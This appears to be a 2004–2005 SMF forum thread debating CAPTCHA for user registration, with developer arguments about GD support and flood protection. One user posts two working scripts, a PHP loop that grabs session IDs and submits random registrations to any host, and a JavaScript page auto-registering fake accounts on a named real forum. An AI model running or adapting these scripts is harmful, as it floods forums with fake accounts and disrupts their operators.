I was just wondering if this was too hard in general and will cause more problem?
I like the font but was wondering if I should change it?
you don't have to register if you want to test it just enter the code and check agree and if it's right it will tell you to go back and enter a username!
http://www.xtram.net/smf/index.php?action=register
also would any one be interested in this?
There are some people who really seem to want to get this implemented in SMF, and it was even put into the cvs without warning once - but that code didn't even remotely work for me, and effectively disabled registration.
SMF has registration spamming protection, although not automatic registration prevention. (the only thing captchas do foir you over what SMF does.) I think this is good enough for the core release, because it works for everyone, not just some people.
-[Unknown]
what would you suggest, I mean I agree the image is hard to read because the O's like like 0's except the 0's stand upright without distortion and many other letters are way to distorted, but what would be needed other then a more distinct font and another type of distortion a computer wouldn't break? I understand this is extremely hard to read now and I'm open to suggestions to get it more user friendly, and I do like the spam protection in place now and I used it in the UserBook mod.
When I say it didn't work for me, I mean that I got X's for images. This is partially because I do NOT have the gd library - and it should not be a requirement for SMF.
The captcha I see is... somewhat hard to read, yes. I would recommend using ONLY letters, and putting a note that ALL characters are in fact letters. Also I hope you ignore case ;).
-[Unknown]
I mean this as a mod not possible inclusion with SMF so someone looking to use this would have to have GD I even have to look up a work-a-round to get GD to load the fonts since I don't know what to do to get freetype and zlib on my PC so even testing was difficult. you think all letters are better or numbers, I guess letters since there are more. and I do ignore case I use strtoupper so anything can be used.
It was me who did the dishonorable thing of adding it to CVS :P However, if was an option that could have been disabled for those without GD installed :D
Anyway - I'll package the code changes into a mod if anyone would find it useful - if you want to do it Aquilo here is the code I used to generate the images:
// Create Human Verification Image.
function VerificationImage()
{
global $modSettings;
$context['template_layers'] = array();
// Can't be called from elsewhere
if (!isset($_REQUEST['sa']) || empty($modSettings['requireRegistrationVerification']))
exit;
// The text to create.
$randomText = $_SESSION['reg_randomText'];
// The image that we will be using as the "verification image"
$verImg = imagecreate(200, 40);
// Background colour - dark blue - nice!
imagecolorallocate($verImg, 11, 30 , 91);
// Define white!
$white = imagecolorallocate($verImg, 255, 255, 255);
// Give it a pretty background.
imagerectangle($verImg, 2, 2, 197, 37, $white);
// Draw the text.
for ($i = 0; $i < 8; $i++)
if (isset($randomText[$i]))
imagechar($verImg, rand (2, 10), 20 * $i + 20, 10 + rand(0, 4), $randomText[$i], $white);
// output image in the browser
header("Content-type: image/png");
imagepng($verImg);
// free memory
imagedestroy($verImg);
obExit(false);
}
Where $_SESSION['reg_randomText'] is set in the Register function to whatever you want the code to be (no more than 8 letters). There's a little more code than this but this is most of it
What I would really like to see is someone take the time to write a captcha class for PHP. Then it can be integrated into different PHP apps. Should also support audio captcha's for those who are visually impaired.
http://www.phpclasses.org/browse/package/1163.html
how would you make a captcha for the visually impaired? are there any visually impaired users here?
I have worked with that voice engine in html before, I was even going to mess around with making it part of YaBB SE but these things are specialized for the forum/site using them.
but how would you do that? A computer could easily interpret audio better then a OCR program with an image, honestly the only distortion you need to mess an OCR up is a jpeg with minor articles around he text and it's messed up!
You distort the audio, add reverb, echo, etc.
php can edit(alter/merge) wav or mp3 files??
How did such an essential feature as this get overlooked? Spammers can just romp onto a forum, set up a simple JavaScript on their computer, and fire off new registrations 100 at a time! Without image verification, they don't even need a valid session ID! I had set up a PHP script to demonstrate this, but that one actually requested a session ID for each one - at the same time, a friend of mine made one in JavaScript that just did it by itself, using the CURRENT session ID hundreds of times!
I like this "[captcha]" thing, that is pretty sleek. But doesn't that require space in the MySQL DB? I made a very simple, though not-as-secure setup that uses ROT13 on the random letters so the client never gets the actual code, except in image. There's a post on my forum (http://forum.falconsys.net/index.php?topic=220.0) with the tweaks to set up this simple mod.
(http://forum.falconsys.net/sources/genregimg.php?string=vzntr)
^ sample output
But seriously, why was such a plainly essential feature overlooked?
It should actually block this... without inconveniencing the user! What a thought! Why would you ever not want to inconvenience someone you want to register?
Go and try it. Register me a thousand accounts on an SMF forum. If you get through, I'll add more protections, but this (captchas, images, inconveniences) is not by far something that is needed.
Quote from: [Unknown] on March 27, 2004, 12:01:25 AM
There are some people who really seem to want to get this implemented in SMF, and it was even put into the cvs without warning once - but that code didn't even remotely work for me, and effectively disabled registration.
SMF has registration spamming protection, although not automatic registration prevention. (the only thing captchas do foir you over what SMF does.) I think this is good enough for the core release, because it works for everyone, not just some people.
-[Unknown]
This was "overlooked" because it can cause problems on some configurations of PHP and shipping a forum that you can't even register on is pretty lame, wouldn't you say?
-[Unknown]
Been there, exploited that. I already said it was done, would I SAY it was done if it wasn't?
<?php
if (isset($_GET['numtimes']) && isset($_GET['url']) && isset($_GET['host'])) {
$max = $_GET['numtimes'];
$path = $_GET['url'];
$port = 80;
$i = 0;
$host = $_GET['host'];
function get_phpsessid(){
$path = $_GET['url']; // URL to f*ck :)
$port = 80; // duh
$host = $_GET['host']; // Host
$fp = fsockopen($host,$port); // Open connection
$request = 'GET / HTTP/1.1'.chr(0x0D).chr(0x0A).
'Host: '.$host.chr(0x0d).chr(0x0a).
'Accept: */*'.chr(0x0d).chr(0x0a).
'Connection: close'.chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a);
fputs($fp,$request);
// fputs($fp,'Connection: close\r\n\r\n');
while(!isset($needle)) {
$****** = fgets($fp,1024); // get 1k of ******
$one = explode(chr(0x0D).chr(0x0A),$******); // explode ****** into array of lines
foreach ($one as $input) {
if (strstr($input,'Set-Cookie:')) {
$needle = $input; // do we see the set-cookie? set that as needle.
fclose($fp); // not wasting bandwidth ;)
}
}
}
return(substr(strstr($needle,'='),1,32)); // give back what we found as the result of the function.
}
for($i;$i<=$max;$i++) { // is $i? yes? then is i <= max? yes? then make i one bigger.
$pass = chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)); // random password, lower a~z, 5 letters
$formdata = array ( "user" => chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).'fsnet', "email" => chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).'@'.chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).chr(rand(97,122)).'falcpwnedu.com', 'passwrd1' => $pass, 'passwrd2' => $pass, "regagree" => "yes" );
//build the post string
$poststring = ""; // else, error
foreach($formdata AS $key => $val){ // parse the array into... well, i guess i could've done without this and just jumped straight into &var=val...
$poststring .= urlencode($key) . "=" . urlencode($val) . "&";
}
$poststring = substr($poststring, 0, -1); // strip off trailing ampersand
$fp = fsockopen($host, $port); // open the connection
$phpsessid = get_phpsessid(); // run the new function to request the index page and steal the phpsessid
echo 'Using PHPSESSID '.$phpsessid.'<br>'; // verbosity = teh pwn
$request = 'POST '.$path.'&PHPSESSID='.$phpsessid.' HTTP/1.1'.chr(0x0D).chr(0x0A).
'Host: '.$host.chr(0x0D).chr(0x0A).
'Content-type: application/x-www-form-urlencoded'.chr(0x0D).chr(0x0A).
'Content-length: '.strlen($poststring).chr(0x0D).chr(0x0A).
'Connection: close'.chr(0x0D).chr(0x0A).chr(0x0D).chr(0x0A).
$poststring.chr(0x0D).chr(0x0A).chr(0x0D).chr(0x0A); // the request, PHP seems to send a bad newline so i have to use 0d/0a
echo 'Sending:<br>'.nl2br($request).'<br>'; // more verbosity
fputs($fp,$request); // send it
//loop through the response from the server
while(!isset($stop)) {
$food = fgets($fp,4096); // food for thought
echo $food; // screen clutter: "accepted", "awaiting email"... "banned"?
if (strstr($food,'Topics by')) $stop = 'YES FFS!'; // stop at the sound of the "member count increase".
}
echo '</table></table></table></body></html>'; // TRYIN to clean up the screen after a partial load...
unset($stop); // so it at least sends something next time
fclose($fp); // no guess, no mess.
sleep(5); // get past teh "YOU JSUT REGISTERED 5 SECOND AGAO!!!!11111oneone" error.
echo '<br><br>Count '.$i.' of '.$max.'...<br><br>'; // more verbosity.
}
} else {
$html = '<html><body>Hello SMF hole! :)<br><br>
<form method="GET" action="'.$_SERVER['PHP_SELF'].'">
Number of random new user regs to run: <input type="text" name="numtimes" size="10"><br>
HOST name (no http, no trailing slash): <input type="text" name="host" size="50"><br>
Remainder of URL (path, including "?action="): <input type="text" name="url" size="50"><br>
<input type="submit" value="******!"></body></html>';
echo $html;
}
// Tag below was put in JUST FOR BLACKBIRD, ya crazy b*stard. :P
?>
By the way, this is the "long version" that I wrote (me not knowing JavaScript, and only having about 1 month experience in PHP). I'll have to dig up the much shorter and less complicated JavaScript one. That one just submits random entries in the form (input type="hidden" name="username" id="user", then document.form.user.value=random) every 5 seconds. The newer version of it opens up about 10 frames of itself and creates 120 registrations a minute. More frames? More users.
Have to wait til tomorrow to get the code for that gem, though.
Heh. Maybe we should raise the spam timeout on register to 60 seconds, that would probably surfice in most cases.
Can't you, like, raise a little flag on the specific session ID that says "Hey, this newbie already registered"? My little PHP script may retrieve a new session ID each time (by grabbing /index.php without sending a cookie in), but it's SLOW! The JavaScript one (it's not tomorrow yet, sorry) relies on the browser, which just keeps telling it the same session ID over and over... of course, there are other ways to go about it.
Not to raise competition here (hmm...), but Invision has done the enter-the-number verification thing for a while now... without the GD library! I think they do it by storing the binary data for the graphics in the PHP source itself (not THAT hard to do, just URLEncode/decode it), but I may be wrong. Maybe you should look into how they do it...?
I did originally write the image verification that Unknown talks about and I actually have it coded (and 90% working) but there are probably better ways than using it and I can't see us ever adding it to the distro - although I may offer it as a MOD. At the end of the day, mass registration on a forum isn't that big a deal. If someone tries it, they can only do it once as you'll quickly delete all the accounts and ban their IP.
SMF checks the IP address of the user and logs it, and it is this that is uses to stop mass registration. It's just as useful going by the IP address as going by the session ID as neither will change in your javascript method.
It's not really that big a deal, but it does get to be a concern on little kid's servers in their closets, when someone gets pissed at them, that they can fill their MySQL DB up with thousands of new users. I'd always thought it wasn't a big deal, and wondered why people did those verification things, until it happened to my server :P
Sure doesn't seem like it logs their IP at all, 'cuz even with me being logged in (!), I can STILL register. Just tried it on this forum, though, and it dumps me at the index page. I guess you fixed that here :)
Both of our scripts ran from the same IP (though the JS one was distributed among clients), and worked fine...
Here's the JS one (happy scrolling!):
<head>
<script language="javascript">
function userValues() {
var firstLetter
var number1 = Math.random()*10
var number2 = Math.random()
var number3 = number1 * number2
var number4 = number3 * 2.5
var letter1 = new Array ("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z");
var finalNumber = Math.round(number4)
firstLetter= letter1[finalNumber]
var secondLetter
var number1 = Math.random()*10
var number2 = Math.random()
var number3 = number1 * number2
var number4 = number3 * 2.5
var letter2 = new Array ("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z");
var finalNumber = Math.round(number4)
secondLetter=firstLetter + letter2[finalNumber]
var thirdLetter
var number1 = Math.random()*10
var number2 = Math.random()
var number3 = number1 * number2
var number4 = number3 * 2.5
var letter3 = new Array ("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z");
var finalNumber = Math.round(number4)
thirdLetter=secondLetter + letter3[finalNumber]
var fourthLetter
var number1 = Math.random()*10
var number2 = Math.random()
var number3 = number1 * number2
var number4 = number3 * 2.5
var letter4 = new Array ("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z");
var finalNumber = Math.round(number4)
fourthLetter=thirdLetter + letter4[finalNumber]
var fifthLetter
var number1 = Math.random()*10
var number2 = Math.random()
var number3 = number1 * number2
var number4 = number3 * 2.5
var letter5 = new Array ("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z");
var finalNumber = Math.round(number4)
fifthLetter=fourthLetter + letter5[finalNumber]
var sixthLetter
var number1 = Math.random()*10
var number2 = Math.random()
var number3 = number1 * number2
var number4 = number3 * 2.5
var letter6 = new Array ("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z");
var finalNumber = Math.round(number4)
sixthLetter=fifthLetter + letter6[finalNumber]
document.reg.regagree.value="yes"
document.reg.user.value=sixthLetter
document.reg.passwrd1.value=sixthLetter
document.reg.passwrd2.value=sixthLetter
document.reg.email.value=sixthLetter + "@" + sixthLetter + ".net"
document.reg.submit()
window.open("http://members.lycos.co.uk/moobbmoo/reg.html")
}
function timeIt() {
setTimeout("userValues()",5000);
}
timeIt()
</script>
</head>
<body>
<form action="http://forum.caservers.net/index.php?action=register2" method="post" name="reg">
<input type="hidden" name="regagree"><br>
<input type="hidden" name="user"><br>
<input type="hidden" name="passwrd1"><br>
<input type="hidden" name="passwrd2"><br>
<input type="hidden" name="email"><br>
</form>
</body>
Quote from: Falcon4™ on August 11, 2004, 09:00:21 AM
Not to raise competition here (hmm...), but Invision has done the enter-the-number verification thing for a while now... without the GD library! I think they do it by storing the binary data for the graphics in the PHP source itself (not THAT hard to do, just URLEncode/decode it), but I may be wrong. Maybe you should look into how they do it...?
And frankly, I don't care. Again, I am not at all even partially interested in that way of doing it.
Quote from: Falcon4™ on August 11, 2004, 05:46:37 PM
It's not really that big a deal, but it does get to be a concern on little kid's servers in their closets, when someone gets pissed at them, that they can fill their MySQL DB up with thousands of new users. I'd always thought it wasn't a big deal, and wondered why people did those verification things, until it happened to my server :P
Sure doesn't seem like it logs their IP at all, 'cuz even with me being logged in (!), I can STILL register. Just tried it on this forum, though, and it dumps me at the index page. I guess you fixed that here :)
I can only assume from that that you are using an older version of SMF. Older versions may not include the same security protections as newer ones..... obviously.
-[Unknown]
Must be hot development if a version that's maybe 3 weeks old is "outdated"... >:(
Quote from: Falcon4™ on August 11, 2004, 11:43:26 PM
Must be hot development if a version that's maybe 3 weeks old is "outdated"... >:(
Umm.... yes, that is rather outdated. You are not a charter member. Consider the date on which that release was made.... April 26th!
That's months ago. Even if development were slow as molasses something had to have been done to the code since then...
-[Unknown]
Even though captchas do not block everyone, they block many casual script kiddies. As soon as we up the ammount of time involved in flooding a board, it decreases the number of people willing to try.
I fully support captchas being added to SMF, after seeing there use on a site that does well over 1000 requests per second.
Quote from: David on August 12, 2004, 04:11:39 AM
Even though captchas do not block everyone, they block many casual script kiddies. As soon as we up the ammount of time involved in flooding a board, it decreases the number of people willing to try.
I fully support captchas being added to SMF, after seeing there use on a site that does well over 1000 requests per second.
I just added more portection to registration, as requested. Didn't take captchas.
And, again, there can be server configuration problems that will make them not work. So good bye to ANY registrations.
-[Unknown]
Just a couple points:
1. Registration spamming is not and will never be a question of one person from one ip, but of thousands of collectively-linked drones from thousands of unique IPs. If you are not familiar with the concept of dDOS (Distributed Denial of Service), then you've been missing out on news of some of the largest attacks against some of the biggest sites with the biggest pipes on the internet. The danger of mass registrations is not from one person, but from at least 1000+ pseudo-persons. It becomes increasingly difficult to weed out or otherwise tell the difference between 1000 different ips with different length and pattern usernames and different emails from different domains from different countries... from just a normal user.
One might argue, however, that if 1000 people are attacking your site you're screwed anyway; however, it's easy to filter out fake traffic versus real traffic router-side during an attack (or simply disable areas of a site). It's quite another to have to go back into a database that's already filled with thousands of fake members, and thousands of spam topics upon those--taking up gigabytes of disk space-- and effectively filter it back out. Invariably, one must find a backup database copy (if there even is a recent one), and restore old, outdated information over what would have been new, up-to-date information, or just remove all new registrations after a certain timestamp.
2. Implementing OCR / Captcha technology in SMF would never interfere with its functionality if done correctly. By default, simply disable it for new installations. If users or their hosting companies have correctly-compiled versions of php with GD[2] installed, then a function can be added to enable the option, if they so desire (just like a user can choose whether or not to dynamically resize off-site avatars).
3. OCR isn't just to make things look pretty; moreover, in almost any case, simple logic to prevent registration spamming is insufficient-- particularly code that scales. It's possible to add global regflood protection based on the site size (for example, a small site isn't going to have 1000 registrations within 1 minute, most likely), however, even after the 'n' number within the 's' seconds ratio has been tripped, there are most likely already 'n' registrations and who knows now many spam topics. Additionally, what if the attacker is patient, and decides not to attack your site all at once, but slowly register thousands upon thousands of drones over the course of one month; then, all at once, reconnects them all to post topic upon topic.
Yahoo uses it. Hotmail/MSN uses it. Egold uses it. If OCR technology was just to make things look pretty, I highly doubt that so many high-end companies plagued with automated registrations would waste the valuable memory and CPU to perform bulk-scale image de- and re-compression operations on-the-fly; at least, not when those same resources could be diverted to something more ambitous.
I am most likely just going to code this in on my own if it lacks the support from others, but I see it as an invaluable feature for anyone who might ever potentially have some ex-packet kiddie sic his new-found toy drones on your site for banning him.
"Respectfully, I dissent." :P
Quote from: koder on March 07, 2005, 10:39:42 PM
Just a couple points:
1. Registration spamming is not and will never be a question of one person from one ip, but of thousands of collectively-linked drones from thousands of unique IPs. If you are not familiar with the concept of dDOS (Distributed Denial of Service), then you've been missing out on news of some of the largest attacks against some of the biggest sites with the biggest pipes on the internet. The danger of mass registrations is not from one person, but from at least 1000+ pseudo-persons. It becomes increasingly difficult to weed out or otherwise tell the difference between 1000 different ips with different length and pattern usernames and different emails from different domains from different countries... from just a normal user.
And this will take down the server, not register a billion accounts. The effects of DDoS attacks are much more pervasive than a few thousand registrations, which are relatively easy for anyone running that high profile a site to clean up.
QuoteOne might argue, however, that if 1000 people are attacking your site you're screwed anyway; however, it's easy to filter out fake traffic versus real traffic router-side during an attack (or simply disable areas of a site). It's quite another to have to go back into a database that's already filled with thousands of fake members, and thousands of spam topics upon those--taking up gigabytes of disk space-- and effectively filter it back out. Invariably, one must find a backup database copy (if there even is a recent one), and restore old, outdated information over what would have been new, up-to-date information, or just remove all new registrations after a certain timestamp.
Why?
DELETE FROM smf_members
WHERE dateRegistered = 'when it happened'
AND lastLogin = 0;
You might lose a person or two, but that'll certainly be the least of your other (much harder to solve) problems.
Quote2. Implementing OCR / Captcha technology in SMF would never interfere with its functionality if done correctly. By default, simply disable it for new installations. If users or their hosting companies have correctly-compiled versions of php with GD[2] installed, then a function can be added to enable the option, if they so desire (just like a user can choose whether or not to dynamically resize off-site avatars).
Wrong. People WILL turn it on, and people WILL not check to see if it works. I don't like building red buttons that say "don't push me" on them into the software. If it breaks for most people, it's a mod plain and simple.
Quote3. OCR isn't just to make things look pretty; moreover, in almost any case, simple logic to prevent registration spamming is insufficient-- particularly code that scales. It's possible to add global regflood protection based on the site size (for example, a small site isn't going to have 1000 registrations within 1 minute, most likely), however, even after the 'n' number within the 's' seconds ratio has been tripped, there are most likely already 'n' registrations and who knows now many spam topics. Additionally, what if the attacker is patient, and decides not to attack your site all at once, but slowly register thousands upon thousands of drones over the course of one month; then, all at once, reconnects them all to post topic upon topic.
I suggest you see a psychologist. You are paranoid. Find me someone who has the resources *and* the immaturity to register 1000 accounts, activitate the emails for all of them (and they can't be all the same domains/automatic, or that could be banned in your over-time scenario) and activate them all at once. If you have enemies that can automate that so easily, captchas won't do you a spot of good. I bet you sleep with a gun under your pillow too, huh?
Read: captchas are just like passwords. To brute forcing, they're another layer but that's all they are. People act as if they are a wall made of the finest steel or something... which is dilluted, at best. Anyone who can do the things you speak of, over time, as you suggest... well, I'd be more worried about the administrator's passwords, captchas or no captchas.
Seriously, if you run a site that needs this, you can install a mod. You had to buy your gun, didn't you? You weren't born with it... apparently your DNA doesn't think it's a necessary feature everyone needs.
-[Unknown]
Hmm, don't see a psychologist (I'm working for my masters in it, though), but how did you know about the gun? It's really for the samurai henchmen that come during the night to tell me things. ;) ;)
Speaking of GD, GD1 is actually available on many of not most commercial webhosts' installations of php. It-- if not gd2-- is also bundled with all of the major control panels (plesk, ensim, cpanel). Every webhost I've ever seen compiles-in GD or Imagemagick (for fear of having to recompile due to excessive requests to enable it). Granted, it along with MySQL support are not by-default compiled into PHP, but just like MySQL many hosts use it. And either way, we've gone over this-- you already have features in the admin control panel that use GD (if a person supports it): Settings -> Avatar -> If the avatar is too large... -> Download and resize it (requires GD module). That's a big red button imo *shrug*
Granted the first half could be considered paranoid, however, when you're mentioning captchas in reference to brute forcing, remember: each captcha token/sequence can only be tried once, and then it is replaced with a new token on each subsequent attempt-- successful or not. The reason Yahoo! uses it with locked accounts (accounts that have exceeded n of bad passwd attempts in x time) is because brute force attacks can no longer work at the time the OCR kicks in. Even a bad password attempt kills the captcha sequence for that given try and generates another for the next login attempt, thus effectively removing the ability to effectively brute-force a password without a person there entering each attempt's captcha code OR software that does really good guesses on a 1:10,000 probability, 5 digit, random, base-10 number that rotates with every page access-- the only records of which remain hidden in server-side $_SESSION variables and in a human-only readable image.
It's something to think about *shrug*. I mean, the chances of success anyway in a brute-force attack are slim, but this would be a pretty effective deterrant from someone thinking "well, I might as well try." And trust me, there are _plenty_ of immature people who have the resources to pull this off. Even I used to be a "l33t hax0r" back in the day. :P Just think about all the other 14 year old packet kiddies who have nothing better to do than play Quake 3 and eat Funions after infecting their computer labs at school with home-brewed, drone-creating vb code. ;)
Anyway, I don't mean to keep beating a dead horse if you're really committed to shaking your head vehemently and not doing this, but it seems to me several other forum scripts eventually ended up integrating this in some form after repeated requests from their users (particularly invisionboard).
Thanks for the consideration, though :)
... and don't tell anyone about the gun. ;D
Quote from: koder on March 12, 2005, 03:20:07 PM
Hmm, don't see a psychologist (I'm working for my masters in it, though), but how did you know about the gun? It's really for the samurai henchmen that come during the night to tell me things. ;) ;)
Heh, heh... see, I thought you'd know I was joking. Funy enough, someone actually complained to me about saying that!
QuoteSpeaking of GD, GD1 is actually available on many of not most commercial webhosts' installations of php. It-- if not gd2-- is also bundled with all of the major control panels (plesk, ensim, cpanel). Every webhost I've ever seen compiles-in GD or Imagemagick (for fear of having to recompile due to excessive requests to enable it).
I've seen a lot of web hosts, and as importantly, test servers set up by novices. It's mad mojo to lose the prospective user on the testing, even if that's the only place the problems will occur. We've had problems with people who compiled OUT session support (enabled by default!)
QuoteAnd either way, we've gone over this-- you already have features in the admin control panel that use GD (if a person supports it): Settings -> Avatar -> If the avatar is too large... -> Download and resize it (requires GD module). That's a big red button imo *shrug*
Avatars are a lot less essential than registrations. If avatars aren't working, they'll ask here. If registrations aren't working, they'll install another software.
Quoteeach captcha token/sequence can only be tried once, and then it is replaced with a new token on each subsequent attempt-- successful or not.
So now you're saying my passwords are even LESS secure than captchas? You're going to have me sleeping with a gun under my log in box!
QuoteEven a bad password attempt kills the captcha sequence for that given try and generates another for the next login attempt, thus effectively removing the ability to effectively brute-force a password without a person there entering each attempt's captcha code OR software that does really good guesses on a 1:10,000 probability, 5 digit, random, base-10 number that rotates with every page access-- the only records of which remain hidden in server-side $_SESSION variables and in a human-only readable image.
Using captchas for logins is a complete joke. Anyone serious enough to really work at it will realize that you can try authentication using the Cookie header, which OBVIOUSLY cannot require a captcha. And the only solution to that is disallowing "log in forever" which would lose a large percentage of our userbase too.
QuoteIt's something to think about *shrug*.
I've thought about it, and as much as I do disagree with it, I'm not discounting it. More importantly, the quality of hosts is - in my opinion - increasing, and I have plans/hopes for it to continue doing so.... don't think there's no future for this idea, but I still don't think it's practical at this point.
QuoteI mean, the chances of success anyway in a brute-force attack are slim
Indeed, there are other protections on registration which would definitely slow people down (transparent ones.)
QuoteJust think about all the other 14 year old packet kiddies who have nothing better to do than play Quake 3 and eat Funions after infecting their computer labs at school with home-brewed, drone-creating vb code. ;)
They don't have 1000 computers to do a distributed attack on you.... because they'd need 1000 IP addresses. That's just crazy.
Quote... and don't tell anyone about the gun. ;D
Well, (assuming you live in America) it's your consitutional right, isn't it?
-[Unknown]
Security code necessary.
Download and try this.
http://www.tahribat.com/denyolaunch/denyolaunch.asp
http://www.tahribat.com/download/denyolaunch.exe (Engilish)